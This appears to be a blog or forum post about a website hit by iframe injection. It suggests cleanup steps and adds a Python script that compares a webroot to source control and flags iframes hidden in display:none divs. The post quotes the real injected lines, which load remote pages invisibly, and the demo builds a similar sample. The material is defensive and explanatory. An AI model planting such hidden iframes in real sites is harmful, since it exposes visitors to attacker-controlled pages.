It is just inexcusable to leave hacked or virused sites up and running. Either fix them or take them down.
A site that I have visited a lot recently (alienscientist.com) has been having what looks like an I-Frame injection problem. The following two lines are injected ahead of the footer on all their webpages:
<div style='display:none'><iframe width='9' height='6' src='http://www.flepstudio.org/od.php frameborder='0' scrolling='no'></iframe></div>
<div style='display:none'><iframe width='9' height='6' src='http://t-tapp.com/od.php' frameborder='0'
Jesus Christos (pronounced "Hay Suesss") it has been a week since the site was infected. Get with the program.
1. The entire site should be under source control - virus programs don't have the intelligence to operate a source control program and contaminate prior versions of the site.
2. Since normally only new files are pushed when doing an update - check the new files.
3. If a virus/hacking problem occurs - check the update console and the server for virus/hack problems thoroughly before attempting cleanup. If your update system has problems:
a. unplug the network
b. recover from the previous backup.
c. change passwords.
d. retest for infection.
e. reconnect to the network.
4. After the update system is solid - do a diff (comparison) of the site to the source control version and push the incorrect files. Check the files that are only on the server - to make sure they are generated or came from a known source.
As a side note - the HTML code above caused all kinds of problems in the post until all the special characters were escaped. The missing </div> tag causes the remainder of the post to disappear - but that is the least of the problems.
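Step 4 of the list above, as an added example that is not the post author's code: it hashes a clean source-control checkout and the deployed webroot, reports modified, server-only and missing files, and flags pages carrying an iframe inside a display:none div like the injected lines quoted earlier. The directory names, sample pages and the injected.example host are constructed for the demo, and the regex is a heuristic, not a complete detector.

```python
import hashlib, re, tempfile
from pathlib import Path

# Heuristic for the pattern in the post: an <iframe> directly inside a display:none <div>.
HIDDEN_IFRAME = re.compile(
    r"""<div[^>]*style\s*=\s*['"][^'"]*display\s*:\s*none[^'"]*['"][^>]*>\s*<iframe\b""",
    re.IGNORECASE)

def digests(root):
    """Map each file's relative path to its SHA-256, skipping .git metadata."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*")
            if p.is_file() and ".git" not in p.relative_to(root).parts}

def audit(checkout, webroot):
    """Compare the deployed webroot against a clean source-control checkout."""
    want, have = digests(checkout), digests(webroot)
    flagged = [rel for rel in have
               if HIDDEN_IFRAME.search(
                   (Path(webroot) / rel).read_text(encoding="utf-8", errors="replace"))]
    return {
        "modified": sorted(f for f in want.keys() & have.keys() if want[f] != have[f]),
        "server_only": sorted(have.keys() - want.keys()),  # generated, or unknown origin?
        "missing": sorted(want.keys() - have.keys()),
        "hidden_iframe": sorted(flagged),
    }

def demo():
    """Constructed sample: a clean checkout and a tampered copy of it."""
    tmp = Path(tempfile.mkdtemp())
    page = "<html><body><p>Hello</p>{}<div id='footer'>footer</div></body></html>"
    inject = ("<div style='display:none'><iframe width='9' height='6' "
              "src='http://injected.example/x.php' frameborder='0'></iframe></div>")
    files = {
        "checkout/index.html": page.format(""),
        "checkout/about.html": page.format(""),
        "webroot/index.html": page.format(inject),   # tampered copy
        "webroot/about.html": page.format(""),       # unchanged copy
        "webroot/img/new.php": "<?php /* constructed placeholder */ ?>",  # server-only
    }
    for rel, body in files.items():
        path = tmp / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(body, encoding="utf-8")
    return audit(tmp / "checkout", tmp / "webroot")

if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

Files listed under modified are the ones to re-push from source control; each server_only entry needs an explanation (generated, or from a known source) before it is left in place.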